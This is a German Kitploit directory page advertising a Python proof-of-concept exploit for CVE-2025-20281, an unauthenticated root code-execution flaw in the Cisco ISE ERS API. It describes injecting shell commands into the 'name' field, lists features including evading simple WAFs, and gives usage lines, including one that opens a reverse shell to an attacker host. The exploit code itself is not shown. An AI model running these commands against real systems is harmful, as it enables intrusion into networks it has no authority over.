Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Cisco-CVE-2025-20281-illdeed — Exploit für die nicht authentifizierte Remote-Codeausführung (CVE-2025-20281) in der Cisco ISE ERS API. Führen Sie Befehle aus oder starten Sie Reverse Shells als Root – keine Authentifizierung erforderlich. | Kitploit
Tools/GitHubGitHub/ill-deed/cisco-cve-2025-20281-illdeed
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungRed Teaming
GitHubill-deed/cisco-cve-2025-20281-illdeed

Cisco-CVE-2025-20281-illdeed

Exploit für die nicht authentifizierte Remote-Codeausführung (CVE-2025-20281) in der Cisco ISE ERS API. Führen Sie Befehle aus oder starten Sie Reverse Shells als Root – keine Authentifizierung erforderlich.

Repository anzeigen
5234vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-20281 — Cisco ISE ERS API Exploit für nicht authentifizierte RCE

Dieses Repository enthält einen Python-3-Proof-of-Concept-Exploit für CVE-2025-20281, eine kritische Schwachstelle in Cisco Identity Services Engine (ISE), die nicht authentifizierte Remote-Codeausführung (RCE) als Root über die ERS API ermöglicht.


🩻 Überblick über die Schwachstelle

Der Cisco ISE ERS-Endpunkt /ers/sdk#_ validiert die Authentifizierung bei der Verarbeitung von Benutzererstellungsanfragen nicht.
Durch das Einschleusen von Shell-Befehlen in den Parameter name des InternalUser-Objekts können Angreifer eine Befehlsausführung als Root erreichen.

  • CVE-ID: CVE-2025-20281
  • Betroffen: Cisco ISE PAN (Policy Admin Node) mit aktiviertem ERS
  • Schweregrad: Kritisch (CVSS 9.8)
  • Authentifizierung: Keine erforderlich

⚙️ Funktionen

  • ✅ Beliebige Befehle ausführen (--cmd)
  • ✅ Schnelltest mit --whoami
  • ✅ Reverse-Shells starten (--reverse)
  • ✅ Keine Authentifizierung oder Sitzungstoken erforderlich
  • ✅ SSL-Warnungen werden unterdrückt und saubere Ausgabe
  • ✅ Legitime Header zur Umgehung einfacher WAFs

🚀 Verwendung

root@kitploit:~
python3 CVE-2025-20281.py TARGET [--whoami | --cmd "id" | --reverse LHOST LPORT]

Beispiele

Testbefehl:

root@kitploit:~
python3 CVE-2025-20281.py 192.168.1.10 --whoami

Benutzerdefinierten Befehl ausführen:

root@kitploit:~
python3 CVE-2025-20281.py 192.168.1.10 --cmd "id && hostname"

Reverse-Shell:

root@kitploit:~
python3 CVE-2025-20281.py 192.168.1.10 --reverse 10.10.14.99 4444

⚠️ Rechtlicher Hinweis

Dieser Code dient ausschließlich zu Bildungs- und autorisierten Testzwecken. Verwenden Sie diese Software nicht gegen Netzwerke oder Systeme, die Ihnen nicht gehören oder für die Sie keine Testberechtigung haben.


🙏 Danksagungen

Schwachstelle: Über Cisco Advisory offengelegt

PoC-Überarbeitung: illdeed

Tool herunterladen